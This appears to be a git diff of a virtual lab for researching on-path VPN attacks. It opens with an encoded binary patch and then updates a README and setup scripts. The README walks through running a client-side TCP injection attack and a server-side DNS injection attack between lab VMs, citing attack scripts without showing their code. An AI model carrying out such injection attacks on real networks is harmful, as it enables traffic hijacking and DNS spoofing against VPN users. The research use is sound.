zMJ2|^?TRXPT<9MtDh?EVy`X|6>%X3XpuGe^n}T%l-%kERpX~}20?qx-kFa>$#t!C| zXRmcpCHf7}z%j6Yxpv-)wzSNcg$%7}M$kG9C#?sQnqF_2aXNAS!?&M^0^NOKqkEPD zv_4FS1(hyY8oK8ohm%9w&b|5WEnz~oXW)*={-(ShG!(ub6nGXfmoG&#^b{}VPJ?*C zu?6KePz{T@zk1#jbB`5@iNxG+;M;9ozFe5AjCT+c-7BN+Zb^>#2TqKC6*B%Ip-@8M z>yTxRf6qzKh<^Zw$3H<68~;S)`d`OCN(0X=yfY?@|8en;zB)Gk@gmmO#XoNFT}i#6 zasM~*?^(LJ+vOx7Zv2b4v3dkW7QPMFR#;rdKU`kH28(_qc+!w${Ch@LV8aNEAOBuX z5dX-wm@O#cdD?2^z$2RWN223nLEw?5Sw@I_U53cT zPe+HycB&&@h#W#2)P4{mcjme}C_zRZxgm`Gxu+NtakCJvM?(_foqDawWi}32P0s)W z`-|(|y=+osy%Y{pG@d(HsORL7Sik-Rg)I6@K;R-Zu1`NJH-;YrLSEd+z*SulA%n-> zvdpIG7UURv3QeeJ`xsQ&eTuyH3xBHjqn$EdpU-SKEv5XtLwSS_pTbbU|`<7GQic6Jxkr{52$ zheg9eT&MFQ7SgdAu~6IyrqpfBPv$>qgnnawauzU!0d9inYavOf?n|&Y1<_(whfF_G z{kIe(e0lHBC>p-JC!^>qn5$6Y=a6N(ycaK4-VIVVO2o=rKu!a#A(F;NlC31WLsA*ATUnZ6Vn431sC)FvXE z-~diN;Dps=Pan0wMHerX=>?)8Z8>sqB)KyBZ*Znj@& zcN@JYmwD`o@Dgkyc!o{lA5X{%9Fzf0a5_^|U_&aGdGFB$;?CdLN**H{b0sVquH*^u z4cl)Ef#8~)N_tjzWSzHJ5Mf~GKNb`)cQI7d&=D(&Hslls-tBaL?e)#ok4HzhKT-?v zqTBJvh+6+0(BFG3+P@yqUjhar3fpuC^d2EyVNTj^>)s1(yufx86CAs(f5Dk$xAkr& zxZ6CWGMxFijmdfdP-X}1q6n9WuKF2HoZCk~e^dR8QP1Cmn`P%=f%(ZhuAN_=Q*3$N zx%1Nzu5r(`tjReB+u<)kn*)bM=HrED&bW06g4TTKFsN>&~^G4fTIyb!MLTkP}ys;Qe;3xpha^dJFEq5Dgroff9SX z@1q`s#K5D@aSuVLWL}Fn%o#+ad)Ap*{EpZ(&fnSe?)GERp6>IE=&V9tzh;DovrDZoh$ZBG{ zu^q@(>(UF*e=RfSBhmbuj5TDqk!3>buj)ah`qoD&t#KdEp1ln8TrEp4NcHL;oJt!x zpbsEZ+;%wd5_t(HCzr*BPt*5+lzBwx_k*4QeF+&FE=a#oQ4yj4LQ%!~5&b1aMaQDo z2`Uc!brZl1&RP!qYh}!2s6U3G{tD2A4owj1g;xqczZ2OXR?%KYUpY^SitOBu!2WO$ zstS(%#UdM;IBc!@-X7Ch^_ICS&;QdFsV6Ydz(f|q za>UeJ2J>&WNc{)(hQ?L0F!b*>n24Z_{v$%1V;cDX^(JlmZW&xTG8kNihEeAhz|z&l zi{1?s*&J9|EF4(<;K_!NhkmlEfP;z^WQ*3BH)-GVpJwdy#Y_@L$5z9_;cCXHYBV7A zo=2#};p6i?Kqf&m^vD@O5gsPP*c?M z_fDW%t*xxLWriP#=D#5}@*KrtM&#)TH_+Jo{S25;1$?9IUm3_ZvP^KyG;l;9&qWd& z$d6L%*>4cfuR{&tc%D8?fYrco52XeA5$opN);mhjlJN2wci8$*HP-*b;(3tVMLZXK zG1c5>R+}W9yJ$0S>rSM!^)4FWrJ`vuyU7UVU%i)HB$W87UV~KMM1JAu_{WEaErXxW zk;~w}A?s_F!MB6da47n3K~Erdfa~iOl^Cs;D5}^|s`n@=G1y836$e$-$yBT{sA8AF zD?pcc8QdxNZ=aL4y0;@@|gg5rfj%x@bMXM+WT;(%KO z#eO7In`rlA$T9`R2XIF&K@}A505~itZWA;yK{1)p8d~FOiUFDq-dN<8;+zNZ%;ypR z%H`I$yi^+#KX_X!(4-mhpL7zx@8T*RJRZa4v&ZX1QCbs zRf578y5@Lz4|2X)JpAK>(edyFsvurG`~fmz;^F_GY;-(K2S)4{9?;*12=L7afAegN zhx3@=*lpd9GsMHUm=p)b=g|-JTE`;cvF7lBABXqXT4x+ds>_Rad`RznEVL)1-3LMm zQPHkPpl1CV!E+GTeOj$ovZ!f2>dMEGW!IY9WDt9jFNw5iZxta@fed4XOSdIff&ce*drtHWrul7&^y*@M|L2J6OK67CK1%Ww0VJEP_3( zsKn5^Pf-nvU|%XKF+6@Qs5lJ%Ky_lUazW(mh>c*kf-YeMlYtA*a({!%jy-5>aO|UV zZ1JMj_fbpuR-aphXmO&}ZtLJ&+9U#lv7$3pa>mL|4{R5~YXS&y+s*fpP-CLW8LG+Z zwws~9P@Cc4H3)E6@cK;9#00O|jH*!B|1Nk9LeT%@;N=$aCnk6~JHFX%H;1Xl{hzGp zwr-=(xcMtCJH8a>wwo??wR!7GuISX()s5guLlPrwk*dHZf>*rTZeB9>V`CmMJu|iv z8NXB|GgKwQS_ki=eGHFZ*@B1z_pgG&7`W#6^&xWt1Mt7G*Bc)mcD+&G8Xdv1*>&+E z*v}xlT9-s$W;`Dp)U7vXLO6Aq@z=BAS8(Wm0PcQnz;JyQ4mt4o`aDw0>x;+2FIe<7 zK=9$I=jGMK8i2#DE;_+izX=UAR$WIxu3=Xfe+q(bR!Xn@5%~}ZUtlalcI%AKix?bn zh4DJdT4aASD$+!Sm|U@cIBb2if{KnGU+SS1u5ojjs&?y3AW59-i~UU}Ma36!Tc=Ux zWR^iI&O@rN2DiwaHXH6GZ}Xit+mB$A59oIxXW#*ZsDW2mxfq8r_tX50q{tJY<)?yE zoX}FGsD$BPsHld8mYWonu-vJFiWXXY6sm|9T8zXsAi!ZkW}~2q2{NxSSpBbqOpwz22d|I@=nv7##q^}S`AsYWzhRKMlY0BV zS|R=5uJ00L&ZNi*gUk%@q#=p1Huz^*!B+*D@rmwxc$%Ed^+d&)XTdsbuU-nGMVd420Jk-z45NZ;6gKo2im`@#Z*WsPI>~FErT{N`-Zs~hZe}aW%{P_(ES@h3=FvXvD0S=2ld(J`p`95-t z`14CtGc5ijfgl`znn)29f8Kx+T4$^QD-nN=q{!bT{tSRmg7`BCOglbQhf&miG;2v zQ8YSq4S_2K{scK+6S|%uDcU4LSFhj{Cv@GZsJ74;ey6C0g)UuD3GaQWprXH�e8ojuPBxG{usmWuYLpRAUj`X z^*HB28JW*R?eTG{B5!120evr}fs@}y3S9Vdgq4S)q%f`#k$?xA*bF=i^%DjiQy$D~ zQF%IH-*(gkSYH0xA7`hpky49&xc%JeyIB+qU*~TE&#)QfstWQb1Fl5m zGKD&_kjk4^;#F{HYy~V9uHbN00eR@Xf20Q2;1wKDn>6S-#0KvP90UVxDgpy{GQJo(`v zTXEw<%~i(Z3fHq`Mj*-nAmuc6&(;7VH~elSA#PpBV!v#G+IR=b6GS53wOVgLHJ0N1 zH<~)+?%oGvb({w0f6%!398W?%2r507g^Vh%4=ci`awJP0&ytZ>T7Cp7r_|1?dhUn3 zJN`trt02&uxvmSeMQwOCd+1APiPETV55GA=j09JHJS*8x#%43*00~>kdz;z02lQKz z8qL=KPVw=)13j(jc9VUX>uR7CL_s=eBMOSUJPUDKEw24&-Pu1k)SiQS@qVgL8Vc^=X4r3}4AabD_hDs$w%B0EW!Fy8;7@NlQGM*Ors z0__`kToj|V^CPbV&nhmlqfP(UNVF0*AcoEc2sW@+k?unaI52yVa^&l^ij)Z5OVT@7 zQg|x4mNa~mK1-1jp-+{hfnD;p7Uj$I<3PjiI0D(BqqqRP17{d8s9%5R7O?*t7JA}- zCEOkIMfcjUmESAq)ICeN0HU?Mk(gu%iOtuc%fWEBwRfrwg1r1!Wbh3LfnD9d4Rc!# z^31It$i7<*-9>YABD?KHthI+OzaJJEYs}8f!hLxBLGVA8oQ{KiV2;E2+ z-qr00Tg%62TX@7&0f?^fd18*I_>mE_OBSIwIXKAi^3fDDs37og)8R#JZ~A|R8<}XM zn5DI#ptc?BY_0om;U>1BIPCL7*+!wCDEll&KA*&m+<(hG+}8csyRDt5$f7r*%!3|cEtq`2d5aX(eSS_;URZ_8#ihc&VP_Z;GDa?*rgc#oxi0WjjF zxm4L!G=Q(FdW2;1w&^pNA0_){k@*SUBFFOEUl(KC8Q9JDVLpCQy6r2j&ma$@X_!W?ao;1rM+?XYiO)GS~eDXVNdnc25puK#$Uz zeK#Wn>WR3bpf))gjU#dtUXOeZp7cs9@Zy^v-Akms_d~i@ImNv2o}p{Kk5w+y&)8e z?%F4i9Xc1~4Ey10QT6Asrz1LmCK4GUT_EP#qWNuPr?as;4g1HNVt*=f)qBA{x)CHt zg9OWu?!PJ{D+PrkbL&UE5aTyQf%S>^)9Evr+xD(lQf9W5!zlDuRfWBugB!JrYdqcA zR~s=QOJpl2)yf)aN#VEMy$_7Du!Y z`lTou8U+hb;|>?fqMm>I9fMGWKJpBmc%)9>fP544nkeRYKJSBFk+R}_A%TO=j?1&0 zK}Xh*4f#XMv&{q;c<1n`{j|_cT{OyJBPBXRmqx?R-qdZsaA=`>L~(~E?s}9s zy$d*MAv8y1wxFd5zmmQ!4t>2rf5dS5g>mQ|2L0Q=4UbFk=L-iyz%-lIE9fg{bSD%T&464?X46?&n+ za|Y`m&T-(GU#E@7v)(Y&?b9HSq9nAY^RcyETO6A!`lD!hy%E4uS~ z5_BHzLT;+ykzBqvyEm0ph}VXj_EhlP5H?hjA+fW=oz?3|qr2*Lq%(2$YF)IvUI%R% zUKvl4AD#oyMsR!mNg^++nKXgQTo|343$6P#xZ$yFzB|ffv&TzYnJHd09eG>FBG?Yz zISoUOw&Q(9@0(Qc)pmS~Q6hWbdcB@PV0Omo6vv%azYKm8GU_Lx^W=C?@592I)?rq2 zFqA)Yo|-D&vBv&!b{vj(D)p^gjkmHL#CRDPQScyFxSZBJbv=1KQXHJ*43?z1g6VkO z_x|E>|8xe#JK9{9XZ$IyKsxNMr)iw4^Vb3EvWJ4x^~L#uOVKk9fSR1K_bkKwQGE`@8pT)a`m zs;7zy;YhoGWp>79{}x66Jjke~pUHGdXgABr@yGYm2gLK##T_TkKHi3x=XZ>sj}&jK z|JW6Hws;&~%nNt1^NVEti0i-y!_H=Z(XekZDg79)F)bK6{3VP}yc>F;3D08iRleaD z$eZ5({=qI-9r=L*r^60@XHR}a+@`+pZNnG7ZQ={x_{Jf=r;d+0+Zy=Ya+_vrtmg;c zZC*b%5cuuo#!6qgk%=#&+VG8YoA}1LwhG^VX34r*l|RXbk3yHNm@r|~@VtqUysBCo zKEP~no{gsNrGFAp&P?1eBBh*;tt)*m9C6u&=jxTN!lv2a1lzdfdf;ZI$@OFw|l5LeLs-GkALI@jdlsMNU!CBB4U5KGhVIfvDbUo3Ghh<`?Q+4#lut z^0@444!*&WhqM5;+F$8|e(<5+GJe{<5zX~iHTcN7$yZzEv(+}$EQ7=i-rD893G8-p z#8{18nbc`EArAUQN?%@QXh0UzU?&uH>jjGrE%EB4hc_g9`_n?70KRP)ZT zt-vQe$K!jrD}7@|jTv=TrTy%)ytc{)U&V|QD*gWY#xqVo-RtKkLMN2f)tqql+$I=8 zV_l8Uc2QI93R|VG0ZKUQbnn?`osOcK23lVYK4(rv)}hg~O51X8!!qx3A3)%u^=l~5 z7+3hxbgXd;k`gsg48yO7L_R<3z^Ci$>!3P+9lJspD*DP~sLC{?sYdMND@+P}!u@%1 zQx)o2hEM9k+=UTG`qZ2Ud1!PouEj3QoWlfz8(%pN+hv%)7#z&EgQC6;-vwS)O-<3( zX)TJcSwCgfRp@!ycIgJZwU@xnLBkxfD2uNvi5m(j2 z&D7U5_)oK~tir&m!3U3*3GB-HT9KB^T-Cq$2J>nkoLGgo%r}nxIzQ?=_eC1Mv1|9t zYl7X2k374I=jY=C&$UhXY;CiBqNf<$<*Bc$t}45vXkt;3rtQPaop|(L?GUNtH~iby zj(bZ*zU>-Gr)`z6qL1^rZ9%RX<=m>=bfdh?R`L(~OnA6lXG}R+U*a#Kqeg|as z5B*H_l+=5Kr^kn}`91BgRT4NF{4}gncw{NQ2EI?}&-l)&Ai_U<#Mt;gxB1)KVZGNY ze#7afh);F%-;g?J@jNJfH2Y@viWB)W^X6 z-sMJh!_pG}#7SoT;KSkgDt3J}>=zRvy(`E6L#@|YeYzhN&u z>t%kQN*%cpW*HuQX*>_UL7qpRN@MBx2?rkho`X0N(7BZyZk1oEQdvmTV)bm`yRh0c zAAO2Xzrm+n=GPnbE8IkQ-^*#-X7-$WQy_&`>}24zo95I|g)VnAPi~N7`t?(TJ&x8BtE^Sc2_NKpA%2U29}~t(dOu({@K8ng zApHjXoWLI%#!C8|0h1o82_K|?06)^l;-3ND0epIxTDE0BVA{Zu#1~{_wI-EhaMj3z z{J64aer!2BZl~paMY%$iA6xE1;B&vC+!~c1TkcxmZC_FD9+iKpkX-(w{Eq`q`OW>y zKICCp?JgD;k(xZ1>(G*=U0}tGJodE>W7&%GDZjqaq0P+5`dQM9?aYrUO%ukqZh?qQuOMw4%|%W){K_`u7hF;mUy0^RiLQ zOq!FCb{bHAOj$Q*zQLYD2&pzZI1-VknP)|fQ+Taag*}(NI&_51-d!W}x$q)5i zMVUHi!y72mdfIU7h$M6kWeQvEOv=P|orZpCMr^v7?P`+k8pZ=g)jFau!=3c_C}Cb^ zPR`Nc{_V#F*2gIKJyCMc$>_HvPla(Rt%m!7`q+Sa_d)&>a4!ARg<*T+ICvcLEk>;D zM=VJBFiJj*19KZuO-k}k>u?Ff^-;f{qdxslLqqFTeX8HjL%+|5gmXl{yJU~i{)(Yr z=a!+N`&j?9o4?NfTp5EY$v=V+aRy@84#@Xr@ZEw-Wv?T)rL2zP8{hwQT9XeQ5tlDK zkUXfb&na*B&`<{XJ}CLB{*35L^ygga>)o%?muNrqmG;QcP!HR${r>CPKbP&_6uvNu6{BYt;oMvFE1ck$aB=1aTt!x8qqGBi|+@nQ0tv*|aJ zbJXB~yTou3@#$vJXZ6du80o(vHep~UH_`VyhxvYK$dgg!hu~NG`q0oU`mq?lo%}+i z{_{pBool%69FP{LBEGf{4UOlxPQOL?qt+yJQPQkYVyvJyIF1)$?#XX@h&T+N)tXcu z9>>i0Bi|OloRIBDxJ$mm63(YRT#NiXl=tD>)ZR#}L*v$ua55Ip%WyQr8((5R^Ah+h z1|K%ld<+d)jTH$^I>)wZX?cMhal ze>qyaGR?Ynw03Kn^~TZKo;2$VqclD3k3vO5$ulgc91lKuM?RFKl~{KtYZqB}CTrJN ztoxI!H(PlAI_tSFnWvhT^b^ZZkZ?^{j~}W(Cl4*SVEU`0wP2EU-x%$dBm%t}FfF+!UE7jo{d}~xH|-4zfPYenWHA{mer&x*X#TD-+E$D8 zjxpLJmT{ZMXkS{aH;vKWOt!8~*X~bEM&UP7txt~DK2N=yK(E1KK3J@_zC1?TVzIuQ z$?n~k32lyhI#atQ$@yPp4~7rdl_rYwx6PAaFyvVlf3$c&rbO z)_!5J-Y;a?I!4=J8TaQg+Chu;_A%Nk$<`|ci*)2Y^vM``<0pR@qjKPsvrQ0Ff# zR@8i#sClPl+#kkhpIWRpj?wy)tt~>GpPAJOAgs=5kfO|bZ@PA!#rj0Lb`R_!UE5_D z_gT93xy5?R8140B>yu-&U8#Rb`FxDFG2MDohPEZ$it{~67g^(O!^n8Ua?%Y++Gd*2 ze~4(cucl zQc4`Wg_K7h?up`I;P?EGgblgH%}>ZzYSfJSzZ{b7(T|n%xZy^$4>NypV9Q;=pB^Lg z75e}8L|6Kct>|ObuOm*9@_bLFC#iI*N@uI|e3e$Hbfrqyt8}AEZ&B%1mF`yQb1HpH zr5~$w#L23Dm7b*1sVbeV((_eXq0*HqU9ZxOD!oOeTUEMSrO&DKEtP(((h<3;ewCi2 z(y1z)tMQ>hkn&=2r8XV$DUY`Ke;;eMbd+ms2DC*+Nv+9V+RW%j8P z@+MEPPaG#RaO;VEYTnem{1{flz+`Zqp5%ywPr}}9JbW_t{gSL< z{TmmbsTuw^nh(5ghr^5#=gHb3+MbQ^@P}&6o8sXQ(|Fk>_DIGqj^XFcdCBm)hJTO7 ze^2X=<9Cv^BeZz_C>dV#;Gas(EW~-ThA5-_w>dLeJ4(yCD<1vPnjPf+;SI9&+5MLSx{-dc*YNE|K^=fm~6 z8hG;Wis8Rr&=2pI-vb}7U3V%zeTomSvGI5fKl1ON;2@~++7^$)kx#r~heo`tR`|Z9 z4nfB~Z63Ts8i@ELB;7YO>phmDIB z3LiU;E)#r)+xfM?o3B3`jrcSS4upujq(_QaU4(n9N;OZaetdJ-#$m+kJgO)$c%ay3qEM?DGtGx*E)DCO~C)B ziobDR82vAgdw{2%xRu{9=J5|E;FFGVb4b!rT6T;b9tk}4A8WS`;Mrb2>0mxCRCqIv z=a&OdJ-DxNh%95B^cw@O`q5Zd{8{0R`@{@K11^1HEj*^_i;lY546_><_TN z4yyYLa}}TQz{jh1Z36r+65tgU;k_q3{+fXPec)+7Ze^c~B)OKG8K3|B1o(TuNBZIGuZt4U zcLPs-mdA{{#}d$o1Rm{Lkf?veCa%6^suAJ5OUCE&9Oc-EVD zujI2>)UIhyDE=uiUYE5YJjIc7vEPZI2ii;3GhZ)LkCQMDfnb*#{Kw4Ki-{y{wYP@7ZZ2hRe0k$ z5`)i3_$%r^)<28|o_e;$j4wOz^c%MG970Uq`^MuO;Aw}I8yx~R;?c!|UZA4>ZB+b? z`}~dZdz<24uk6#OO5LA;&+$h{dHN;Ga`?-fV0>K1o1-3Isj@gnWwLd=v}(@OAV<3SX-He^3?r z2zc6Cp0YQ9;z-88VgC+`7r@7}!-@p>wF&T>65zXmw<#IS$qT?!o>DcAFf9?s1(;V; zeyft-m|syZJa0*We@5UDH6bo1k4lt&jP`z@==)>zmU(P^ zy^T}&zL<7tWexsDe^W)pgfh+JnLBHNr`T1p(Bsj{@#N?7szyA@?D5xl%Bt&XeT|?f zuk$Rgu3P4<_LTeU8X7&`re+Nfj^cqXJe)jX+LZjs@rgVYcb8eGggrrN(EZ=&XzQ+(dcf?|)S5zlD4JY`LIl(g3G z5l?x0@N6v#m-vgPdpuQj>;(n$iabU03t<@2N{sV4^A~xFoQl9%xIpt1{%C%| zJl8DHMfGEOG(tQ_8F(ZT=D z=K~AvMJr{kQ&-}F>AD72HLRw(s0a@=&hy}bYCe~UXEmG#zp{7jQ-mc|)q3z8F%7Dk{G%SCEzA>@P7{Tz>LX>p?%C7Ai7eH%PHd3i%@4KYu{8cGmCa;Rd+V7%mcG(Vb$!KI03 zgf)-rJdCz-G^?r62eV;keIvEGV$>$v87qa<3WhO8xWBTYZWZ*7Az6(lz=t(Ya+tcn zy9(k;wOp{U1ZBVVv$viL7M?G;2`436^{v_1^I$IQ&xX27MCUFnkxZw_=jR)Q#ZQ8J zrKu|)qcn)N;vE>XCb|~PUb(VpF6;}&MGHd*(ARlA%i!>9J!M{hS*62)kykL&<*`qo z-!iI+(IsnJ=u&F7&%`6hVKHjFRkez(P%Vtd<7+PS;ne|kwZpl8ngd+1 zY8!nGepd~qC?$0ZJ<$ru*P_ENJUBIU{(KB^PCUHJs#eAm*brV=TFTcyHLqOdw8n#`#rv z8BBwxzPzc(&1i(#9pbQfu>!ipKE1vYj*X!LT9$7J;lNQ-xrm$PT#lVDhP)9n!g2pw z4_M*q8+_G1R1QO~@zs>oUlQ>zcGH|F5}W?bsvH)MWaDGsx}gHU(f3L>^tX&UaGT9l z{z%KD=R{cf76YDsL)AUejo$P5OR!|{H7I-c*r(3-`B&97tZ?C_It_g3NYO>)SD^rwh1m!pdT0JcH-q6MMdI$7tvlo zxW)2nceJ-;W1?ILCWCQZh>$w0rl{J$qjuG>Npv_^Cki$Rm{CuSK5s)=CHUGW$q?z0 z?}}Lv8A*w{!9Jz1Xm-J(V$ASe^NP+}w2*{i9u@bU9^&;_hV$3ZKd8GF%MjJYTmztE z{lwVql2|NZMLd%cH&0DO@D`jCoCEkLFZAq!c*a`s*YH7WVjBu#qaKw&2Q5Q z>&I@MiA@ocI??U~i%*tAwjVWwxL?N zKAgZsGv`JB&PAQ(nY+@nKy8xDVwmO*iD9I$DSKYMSFEhVp+yS$t=?>8FpTO|yS)}K z1XBZ08nv){TJ9u-q@s($f*6rjh2*d5>bS-))`Ai5h%J{e>nM>X!Ql!?O8k=%I}L{( zvwj~I8YKI2?{F6wGZ&hOc~N84S5JrVqPta;F6_m=!AwQ@1fjlR(#ffU@KoRCZB)i< zzPK)rn1nGWFwZ}tRs`?^7sfB-8 zYx1f}uYZ^W<0L(-zSxK&-DTnksdgMxK!7bylYxWwh%xW4Ge&J>ffTN5mOb9Ww5hQg z@2`uvQMIi4_YQRXWQ6+V*mNq#bPV$c?pk0|#F&yRi;LdaiJ9|=kP@EqV>5-Op(a2L zKFlraRz*+jBkStP;bpU&M??%`*rY}UIAfv}Z?&%W3t}yu2D1$747Dw1Or|Emb9wM` zOsvN6B28mf|NnZsde|tAD7;vraU?`T3zh;B6s)jCEYqC=mT=<&45DJWKlv8CUh8h} zu&LcdN>U-@!Zc7JffA_bpfsscBGFudgv$sTM8)^syl-xII4h7KkK~(uGxN>=@0<6= zBc>zrg2a3q{`+v#$>VY{m*zb!&DjMo7$w`mI%*m4lb4Rt1iaE_((Lt>v*_!Af&TL{ zs)J}|?3O|Di)sYx7p}{yuO~`;mux-$1~GnBN;%Dq{7m%u{^fa)3d^21q(e(dpN-5t@eBa z9fZ7&TkVa#_#OK@FiUINSD#E}_Vx2KmP(zU(S!f@{zq3bZM$*9*;V&+WiIy{%Y3Cb zpMEg{{IHsBwXv)01cM|NKJdbl@B?{MgUy%R(=65T#H0+5{cR0*8ccDGpeI({nB!$a zJx)i-l~sB068oiIKa(DR{yZ4_a)*Ije(PO}a913|ZT?bLJ>)2-X*5yDt&>ZG4Qz~e z?K=8mCA`4_uw$WTVY?{Y`A&G5;S$6dVDH7yraF5yk;~f{?pkoF09PCrNtNE<3bmZ& zt9Iff$9ApXZ6|}YTlDK#TFc{GI>z4J;#(_x7Mt62d39{Y$j8#RY*CrATiVxcxN>S- zH`9Z>ut%#0wMu0oi_^3ANa^jBI#y!vjeWaw6*EDYQ)0Nigv=zldf#uYR;?~A0;&XPNv|* zhy;FM71ae`Uu!Ex6zlC>jL&#E2MIcKiO+5AK z<{$?thI+V;8tLPZzK##kfhC@Lcb}}{cP$|E&v3MF!C!Q0NmD;>7xD>WhWZPA1K3g| z=HHy7JLXP2_4syZ{hw#T> z)EnD*;s9ZNhv~mVFd3@EQ&01?;luDD{Q+1hKk?M(9DXJKBe2rM#}Bbx39050Rb9_gPBA^!ugY>1;h8Q>{bd-$0{ahx*_;z*0! zvbeGQ)Jr{S_&H8I2ACqy>?4-`nZTX+p8|I&s~Fl4$M$KfhyC1>jsbI&0UhaaMk*at pk$T;*{O>}3QjAQ8=kUk!vtDF)vh4Wu=Hg%ObJ6B;dIZ^tJ_9_+XHNhC literal 0 HcmV?d00001 diff --git a/virtual-test-environment/virt-lab/.gitignore b/virtual-test-environment/.gitignore similarity index 100% rename from virtual-test-environment/virt-lab/.gitignore rename to virtual-test-environment/.gitignore diff --git a/virtual-test-environment/README.md b/virtual-test-environment/README.md index af3f62c..cabfdc4 100644 --- a/virtual-test-environment/README.md +++ b/virtual-test-environment/README.md @@ -1,5 +1,5 @@ -# virtual-test-environment -VM lab environment for testing on-path VPN attacks +# virt-lab +VM lab environment for doing network stuff ### Requirements @@ -10,61 +10,73 @@ VM lab environment for testing on-path VPN attacks ### Setup base virtual network -1. Start all 6 VMs (3 routers and 3 edge nodes): `cd virtual-test-environment; ./boot_all.sh` +1. Start all 6 VMs (3 routers and 3 edge nodes): `./boot_all.sh` 2. Go do something else cause its gonna take a while.. -3. ssh to some machine: +3. (Optional) ssh to some machine: * ssh by port: `ssh -l vagrant localhost -p 22111` - * ssh with vagrant: `cd edgers/vpn-server/; vagrant ssh` or `cd ; vagrant ssh` + * ssh with vagrant: `cd edgers/vpn-server/ && vagrant ssh` or `cd && vagrant ssh` 4. Restart all the machines to make network changes take effect: `./stop_all.sh` then `./start_all.sh` -5. Make sure edge nodes can ping eachother: `ping 192.168.3.2` +4. Build VPN server and add VPN client config file to client node: `cd virt-lab/configs; ./configure_vpn.sh` + ![picture](diagrams/virtlab-setup.jpg) -#### Build VPN server +#### Connect client to VPN server + +1. Ssh to the client VM: `cd virt-lab/edgers/client && vagrant ssh` +2. Connect to the local vpn server: `./connect.sh` + + + + +## Client-Side Attack + +#### Configure client side attack environment + +1. Navigate to configuration folder: `cd virt-lab/configs` +2. Run setup script to build gateway attacker node: `./setup_cliside_env.sh` -1. Copy setup scripts to vpn server VM: `cd virtual-test-environment/edgers/vpn-server; ./copy_vpn_setup.sh` -2. Ssh to vpn server VM: `cd virtual-test-environment/edgers/vpn-server; vagrant ssh` -3. Run interactive script to setup vm as a OpenVPN server: `./setup_vpn.sh` -* Keep hitting `Enter` or `y` to leave all default values -4. Run script to generate client config file: `./make_client_configs.sh` -#### Connect client to VPN server -1. Run script to copy `client1` config file from vpn server to client vm: `cd virtual-test-environment/edgers/client; ./copy_client_config.sh` -2. Ssh to the client VM: `cd virtual-test-environment/edgers/client; vagrant ssh` -2. Install OpenVPN on the client vm: `./connect.sh` -3. Connect to the local vpn server: `sudo openvpn --client --config client1.ovpn &` +#### Test client side attack -#### Setup DNS server on "web-server" node -1. Run script to copy dns setup scripts to vm: `cd virtual-test-environment/edgers/web-server; ./copy_dns_setup.sh` -2. Ssh to server vm: `cd virtual-test-environment/edgers/web-server; vagrant ssh` -3. Run docker install script: `./install_docker.sh` -4. Start the dns bind docker container: `./start_dns.sh` (may need to log back in for new docker permissions) -5. Check to make sure its alivee: `docker ps` or `docker logs bind` +1. ssh to victim client VM (base host): `cd virt-lab/edgers/client && vagrant ssh` +2. Connect client to VPN (in client vm): `./connect.sh` +3. Open another shell to ssh to web server node (base host): `cd virt-lab/edgers/web-server && vagrant ssh` +4. Open another shell to ssh to gateway attacker node (base host): `cd virt-lab/routers/gateway && vagrant ssh` +5. On web-server vm, open a netcat connection for the client to connect to: `nc -l 8080` +6. On the client vm, connect to the web server: `nc 192.168.3.2 8080 -p 40404` +7. On the attacker vm, navigate to the attack folder: `cd vpn-attacks/client-side-attack` +8. Rebuild all the attack scripts (attacker): `./rebuild_all.sh` +9. Navigate to full attack folder (attacker): `cd complete_attack` +10. Start full attack script (attacker): `./attack.sh` +11. Wait for script to infer private tun IP, port in use, exact sequence number, and in-window ack number needed to inject TCP -#### Setup attack router for dns inject attack -1. Start script to copy attacker setup to vm: `cd virtual-test-environment/routers/router1; ./copy_attacker_setup.sh` -2. Ssh to router vm: `cd virtual-test-environment/routers/router1; vagrant ssh` -3. Run the setup script to install spoofing libraries and repo: `./setup_attacker.sh` -4. Change to dns attack folder: `cd VeepExploit/server-side-attack/dns-sside/full_scan` -5. Compile the attack script: `make` -6. Run the attack: `sudo ./uud_send ` +## Server-Side Attack + +#### Configure server side attack environment +1. Navigate to configuration folder: `cd virt-lab/configs` +2. Run setup script to build gateway attacker node: `./setup_servside_env.sh.sh` +#### Test server side DNS attack -### Test the DNS Injection +1. ssh to victim client VM (base host): `cd virt-lab/edgers/client && vagrant ssh` +2. Connect client to VPN (in client vm): `./connect.sh` +3. Open another shell to ssh to router1 attacker node (base host): `cd virt-lab/routers/router1 && vagrant ssh` +4. On the attack router vm navigate to dns inject folder: `cd vpn-attacks/server-side-attack/dns-sside/full_scan/` +5. Compile full attack script (attacker): `make` +6. Issue DNS lookup from client vm: `nslookup test.com 192.168.3.2` +7. Start inject script from attacker node: `./inject_test.sh` -1. Either run the overload script or simply turn off the local DNS server to ensure the real responses do not beat our injected responses: `docker stop bind` (on web-server VM) -2. Query for our test domain from the VPN client node: `nslookup yo.com 192.168.3.2` (`yo.com` is hardcoded as the domain name response in the injection script)3. Make sure there is a `conntrack` entry on the VPN server for our clients lookup: `sudo conntrack -L | grep 192.168.3.2 | grep udp` -4. Start the injection script from the attack node once the client has issued the request: `sudo ./uud_send 192.168.3.2 53 192.168.2.2 32000 62000` -### Teardown +## Teardown 1. Stop all the VMs: `./stop_all.sh` 2. Destroii all VMs in our path: `./destroy_all.sh` diff --git a/virtual-test-environment/boot_all.sh b/virtual-test-environment/boot_all.sh index 2614505..2f697fb 100755 --- a/virtual-test-environment/boot_all.sh +++ b/virtual-test-environment/boot_all.sh @@ -68,3 +68,18 @@ cd ../web-server vagrant up echo "$BORDER Finished booting web server.." + + +#cd ../.. + +#printf "\n\nRebooting all machines to take new network configs..\n\n\n" + +#sleep 2 + +#./stop_all.sh + +#sleep 2 + +#./start_all.sh + + diff --git a/virtual-test-environment/configs/configure_vpn.sh b/virtual-test-environment/configs/configure_vpn.sh new file mode 100755 index 0000000..ffa6683 --- /dev/null +++ b/virtual-test-environment/configs/configure_vpn.sh @@ -0,0 +1,29 @@ +#!/bin/bash +# + +printf "Configuring vpn server node..\n" +sleep 1 + + +cd ../edgers/vpn-server +./copy_vpn_setup.sh + + +ssh -p 22119 -i .vagrant/machines/default/virtualbox/private_key vagrant@localhost ./setup_vpn.sh + + + +printf "\n\nConnecting client node to vpn server..\n" +sleep 1 + +cd ../client +./copy_client_config.sh + +#ssh -p 22111 -i .vagrant/machines/default/virtualbox/private_key vagrant@localhost << EOF +# ./connect.sh +# exit +#EOF + + + + diff --git a/virtual-test-environment/configs/setup_cliside_env.sh b/virtual-test-environment/configs/setup_cliside_env.sh new file mode 100755 index 0000000..0a30e8c --- /dev/null +++ b/virtual-test-environment/configs/setup_cliside_env.sh @@ -0,0 +1,15 @@ +#!/bin/bash +# + + +printf "\nConfiguring gateway attacker node..\n\n" + +sleep 1 + + +cd 